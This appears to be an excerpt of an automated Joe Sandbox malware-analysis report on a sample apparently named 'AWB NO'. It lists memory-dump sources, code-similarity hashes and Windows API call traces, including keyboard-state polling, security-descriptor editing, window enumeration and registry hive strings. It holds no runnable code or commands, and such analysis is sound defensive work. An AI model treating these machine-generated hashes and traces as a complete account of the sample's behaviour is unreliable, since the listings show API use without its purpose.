                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1652260434-3619404913
                                                              • Opcode ID: ba74acf88bc8afc12da4d1a0b4acd557f342eae14ade622755994d8a017ce3c8
                                                              • Instruction ID: 86a82787039558be905cb5ee93fd95c55d710ea48d453bde977e80527a28d278
                                                              • Opcode Fuzzy Hash: ba74acf88bc8afc12da4d1a0b4acd557f342eae14ade622755994d8a017ce3c8
                                                              • Instruction Fuzzy Hash: 14717171140205AFE710EF18CC45F6B77E5FB88304F08492EF985972A0D7B8E956CB6A
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048BB6E
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00489431), ref: 0048BBCA
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048BC03
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048BC46
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048BC7D
                                                              • FreeLibrary.KERNEL32(?), ref: 0048BC89
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048BC99
                                                              • DestroyIcon.USER32(?,?,?,?,?,00489431), ref: 0048BCA8
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BCC5
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BCD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1446636887-1154884017
                                                              • Opcode ID: 37424d4d7763948733a8dca49077fd2f9633061e04095cbabdff28e088f3a0fe
                                                              • Instruction ID: 5370879412d3ef42147b43b34bb4041711e9c26008a93505a4a8dcab61b4cfc6
                                                              • Opcode Fuzzy Hash: 37424d4d7763948733a8dca49077fd2f9633061e04095cbabdff28e088f3a0fe
                                                              • Instruction Fuzzy Hash: E661CE71600219BEEB14EF65CC45BBF77A8EB08710F10492EF815D61C1DBB8A994DBA8
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 0046A636
                                                              • GetDriveTypeW.KERNEL32 ref: 0046A683
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A6CB
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A702
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A730
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 1600147383-4113822522
                                                              • Opcode ID: 946188dde1d9c215ad57ce0c356ac964412de47c7a0f2ef33d30d7c056bd663b
                                                              • Instruction ID: 6be42100393f5907e158319192f1f81eb493a356fa9d8496d4bade02da62f26d
                                                              • Opcode Fuzzy Hash: 946188dde1d9c215ad57ce0c356ac964412de47c7a0f2ef33d30d7c056bd663b
                                                              • Instruction Fuzzy Hash: 74516AB12043049FC700EF25C88196AB3E4EF94308F14496EF885672A2DB39EE0ACF56
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004776A2
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004776AE
                                                              • CreateCompatibleDC.GDI32(?), ref: 004776BA
                                                              • SelectObject.GDI32(00000000,?), ref: 004776C7
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0047771B
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477757
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0047777B
                                                              • SelectObject.GDI32(00000006,?), ref: 00477783
                                                              • DeleteObject.GDI32(?), ref: 0047778C
                                                              • DeleteDC.GDI32(00000006), ref: 00477793
                                                              • ReleaseDC.USER32(00000000,?), ref: 0047779E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 933ace60e19415b5136d2c61b858a78281b90340d02f08f7ce8c0e2b82895f36
                                                              • Instruction ID: 35a76c6371ee925a40e749d113c81bfe70045e9a1f5769368c195ea94eb780e8
                                                              • Opcode Fuzzy Hash: 933ace60e19415b5136d2c61b858a78281b90340d02f08f7ce8c0e2b82895f36
                                                              • Instruction Fuzzy Hash: B2514A75904209EFCB15CFA8CC84EAEBBB9EF49310F14892EF949A7210D735A845CB64
                                                              APIs
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00458766
                                                                • Part of subcall function 0045874A: GetLastError.KERNEL32(?,0045822A,?,?,?), ref: 00458770
                                                                • Part of subcall function 0045874A: GetProcessHeap.KERNEL32(00000008,?,?,0045822A,?,?,?), ref: 0045877F
                                                                • Part of subcall function 0045874A: HeapAlloc.KERNEL32(00000000,?,0045822A,?,?,?), ref: 00458786
                                                                • Part of subcall function 0045874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0045879D
                                                                • Part of subcall function 004587E7: GetProcessHeap.KERNEL32(00000008,00458240,00000000,00000000,?,00458240,?), ref: 004587F3
                                                                • Part of subcall function 004587E7: HeapAlloc.KERNEL32(00000000,?,00458240,?), ref: 004587FA
                                                                • Part of subcall function 004587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00458240,?), ref: 0045880B
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00458458
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0045848C
                                                              • GetLengthSid.ADVAPI32(?), ref: 0045849D
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004584DA
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004584F6
                                                              • GetLengthSid.ADVAPI32(?), ref: 00458513
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00458522
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00458529
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0045854A
                                                              • CopySid.ADVAPI32(00000000), ref: 00458551
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00458582
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004585A8
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004585BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast
                                                              • String ID:
                                                              • API String ID: 1795222879-0
                                                              • Opcode ID: 627c0861b54cffdfc9a529a4ed73b197297eeeab106a519f0bcebb365129c94a
                                                              • Instruction ID: e0118614a4d337cb82eb8ed29ac7d5de28cd502eb863139baceb9309d046dcf4
                                                              • Opcode Fuzzy Hash: 627c0861b54cffdfc9a529a4ed73b197297eeeab106a519f0bcebb365129c94a
                                                              • Instruction Fuzzy Hash: D5614971900209BFDF009FA1DC45AAEBBB9FF05305B14856EE815B6292EF359A09CB64
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00478BEC
                                                              • CoInitialize.OLE32(00000000), ref: 00478C19
                                                              • CoUninitialize.OLE32 ref: 00478C23
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00478D23
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478E50
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478E84
                                                              • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478EA7
                                                              • SetErrorMode.KERNEL32(00000000), ref: 00478EBA
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478F3A
                                                              • VariantClear.OLEAUT32(?), ref: 00478F4A
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID: ,,I
                                                              • API String ID: 2395222682-4163367948
                                                              • Opcode ID: a4fa72b6251a261673152e8d551cfcfce9f93389bfa5b197c4d2fb87e7c213e2
                                                              • Instruction ID: 22c5d904e23ad896e3453865a061727a73fd10ed6b7a79d4550a4018499a7712
                                                              • Opcode Fuzzy Hash: a4fa72b6251a261673152e8d551cfcfce9f93389bfa5b197c4d2fb87e7c213e2
                                                              • Instruction Fuzzy Hash: 30C134B1608305AFC700EF25C88896BB7E9BF88348F00896EF589DB251DB75ED05CB56
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C4EC
                                                              • GetFocus.USER32 ref: 0048C4FC
                                                              • GetDlgCtrlID.USER32(00000000), ref: 0048C507
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C65D
                                                              • GetMenuItemCount.USER32(?), ref: 0048C67D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 0048C690
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C6C4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C70C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C744
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C779
                                                              Strings
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                              • String ID: 0
                                                              • API String ID: 1026556194-4108050209
                                                              • Opcode ID: 3b22527250bb857676f033400117c0a4a589467c0e3a6cbd12af7d2930364d0d
                                                              • Instruction ID: 044de7e4dd35a86088de80346c1f5ac2e8e2e031d82544e17b68ab28cbecaa44
                                                              • Opcode Fuzzy Hash: 3b22527250bb857676f033400117c0a4a589467c0e3a6cbd12af7d2930364d0d
                                                              • Instruction Fuzzy Hash: A1818E70608311AFDB10EF15C984A6FBBE8FB88314F104D2EF995A3291D774D905CBAA
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00480038,?,?), ref: 004810BC
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: 49435cde43217b087a11d2c00bd5a2123b7dea488265586aa8398591abf3c7f8
                                                              • Instruction ID: 88389359f98c9660e251b743cdbb8ea94c24b57ab6fd2e1b5df4b40edaf02939
                                                              • Opcode Fuzzy Hash: 49435cde43217b087a11d2c00bd5a2123b7dea488265586aa8398591abf3c7f8
                                                              • Instruction Fuzzy Hash: 7C41A23021025A8FDF10FF91D8909EF3368EF15344F40486BEC91672A2DB78A917CBA9
                                                              APIs
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004655D2
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004655E8
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004655F9
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0046560B
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046561C
                                                              Strings
                                                              Similarity
                                                              • API ID: SendString
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 890592661-1007645807
                                                              • Opcode ID: 3a9452b80133d29a36de1d33652f02739a6eb89e8620773832276c0ac014e26d
                                                              • Instruction ID: 68fb84bb15ae9a695f4df20fb78c4172828bcb64e514a9d34bf5732b9d8ca5cc
                                                              • Opcode Fuzzy Hash: 3a9452b80133d29a36de1d33652f02739a6eb89e8620773832276c0ac014e26d
                                                              • Instruction Fuzzy Hash: FB119030A6016979D720B666CC4AEFF7ABCEF95B04F50042BB805A20D1EA781D05C9BA
                                                              APIs
                                                              • timeGetTime.WINMM ref: 0046521C
                                                                • Part of subcall function 00420719: timeGetTime.WINMM(?,75A79610,00410FF9), ref: 0042071D
                                                              • Sleep.KERNEL32(0000000A), ref: 00465248
                                                              • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0046526C
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0046528E
                                                              • SetActiveWindow.USER32 ref: 004652AD
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004652BB
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004652DA
                                                              • Sleep.KERNEL32(000000FA), ref: 004652E5
                                                              • IsWindow.USER32 ref: 004652F1
                                                              • EndDialog.USER32(00000000), ref: 00465302
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: 98ddb0703cd61d87628edcf0d98f7d375aff7407ac3e624b6a34ef0c4065cd16
                                                              • Instruction ID: cd7097472c257bb23b584a981be65a72fabdbfa26ce45d940019a60a8d0d7c0a
                                                              • Opcode Fuzzy Hash: 98ddb0703cd61d87628edcf0d98f7d375aff7407ac3e624b6a34ef0c4065cd16
                                                              • Instruction Fuzzy Hash: 2421A474204704BFE7405F20ED88F2A3B69EB4578AF10187EF402922B1EB699C459F2F
                                                              APIs
                                                              • GetMenuItemCount.USER32(004C6890), ref: 0043D7CD
                                                              • GetMenuItemCount.USER32(004C6890), ref: 0043D87D
                                                              • GetCursorPos.USER32(?), ref: 0043D8C1
                                                              • SetForegroundWindow.USER32(00000000), ref: 0043D8CA
                                                              • TrackPopupMenuEx.USER32(004C6890,00000000,?,00000000,00000000,00000000), ref: 0043D8DD
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0043D8E9
                                                              Similarity
                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                              • String ID:
                                                              • API String ID: 36266755-0
                                                              • Opcode ID: 9490ec5a4a562f1e19a84607bd5d48b970607660fc041d08b13ba27c1a5a2ef6
                                                              • Instruction ID: 6ad6198a349bf1976c625735b1d5f841e5fdeefb3eec3c97a7380737a116b5bf
                                                              • Opcode Fuzzy Hash: 9490ec5a4a562f1e19a84607bd5d48b970607660fc041d08b13ba27c1a5a2ef6
                                                              • Instruction Fuzzy Hash: 6B713A70A00205BEEB209F15EC45FAABF64FF48358F200227F525662D1C7B96810DB59
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 004605A7
                                                              • SetKeyboardState.USER32(?), ref: 00460612
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00460632
                                                              • GetKeyState.USER32(000000A0), ref: 00460649
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00460678
                                                              • GetKeyState.USER32(000000A1), ref: 00460689
                                                              • GetAsyncKeyState.USER32(00000011), ref: 004606B5
                                                              • GetKeyState.USER32(00000011), ref: 004606C3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 004606EC
                                                              • GetKeyState.USER32(00000012), ref: 004606FA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00460723
                                                              • GetKeyState.USER32(0000005B), ref: 00460731
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                              • Instruction ID: d70e1bade3edcafa3224126adcd65a49494c39be54c13286bda3ce7ebf6ec1a5
                                                              • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                              • Instruction Fuzzy Hash: F551AA60A0479429FB35DBA084557EBAFB49F11380F08459F95C2572C2FA5C9A8CCB5B
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0045C746
                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C758
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C7B6
                                                              • GetDlgItem.USER32(?,00000002), ref: 0045C7C1
                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C7D3
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C827
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C835
                                                              • GetWindowRect.USER32(00000000,?), ref: 0045C846
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C889
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C897
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C8B4
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C8C1
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                              • Instruction ID: 20628bd5887914f4131c215851d3afbb63228a24f6148e02c9e6462ef7cb0285
                                                              • Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
                                                              • Instruction Fuzzy Hash: 54517171B00205AFDB08DFA8DD89AAEBBB6EB88311F14853DF915E7291D7709D04CB14
                                                              APIs
                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                              • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0043BEF6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF27
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF3E
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BF5A
                                                              • DeleteObject.GDI32(00000000), ref: 0043BF6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              APIs
                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                              • GetSysColor.USER32(0000000F), ref: 004021D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045AAA5
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045ABAE
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0045AC21
                                                              • GetDlgCtrlID.USER32(?), ref: 0045AC73
                                                              • GetWindowRect.USER32(?,?), ref: 0045ACA9
                                                              • GetParent.USER32(?), ref: 0045ACC7
                                                              • ScreenToClient.USER32(00000000), ref: 0045ACCE
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0045AD48
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0045AD82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                              • String ID: %s%u
                                                              • API String ID: 1412819556-679674701
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0045B3DB
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045B414
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0045B431
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B498
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B4CF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B518
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B550
                                                              • GetWindowRect.USER32(00000004,?), ref: 0045B5B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 3725905772-1539354611
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C67B0,?), ref: 00402374
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0048C2E4
                                                              • ImageList_EndDrag.COMCTL32 ref: 0048C2EA
                                                              • ReleaseCapture.USER32 ref: 0048C2F0
                                                              • SetWindowTextW.USER32(?,00000000), ref: 0048C39A
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0048C3AD
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0048C48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$prL$prL
                                                              • API String ID: 1924731296-740887564
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A47A
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A4D9
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A4FE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A58E
                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A599
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 0046A5A2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0046A5AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 3827137101-3457252023
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004877CD
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 004877D4
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004877E7
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004877EF
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 004877FA
                                                              • DeleteDC.GDI32(00000000), ref: 00487803
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0048780D
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00487821
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0048782D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0046D855
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D8E8
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0046D8FC
                                                              • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004BA89C,?), ref: 0046D948
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D9B7
                                                              • CoTaskMemFree.OLE32(?,?), ref: 0046DA0F
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0046DA88
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046DAAB
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0046DAB2
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046DAE9
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0046DAEB
                                                              Memory Dump Source
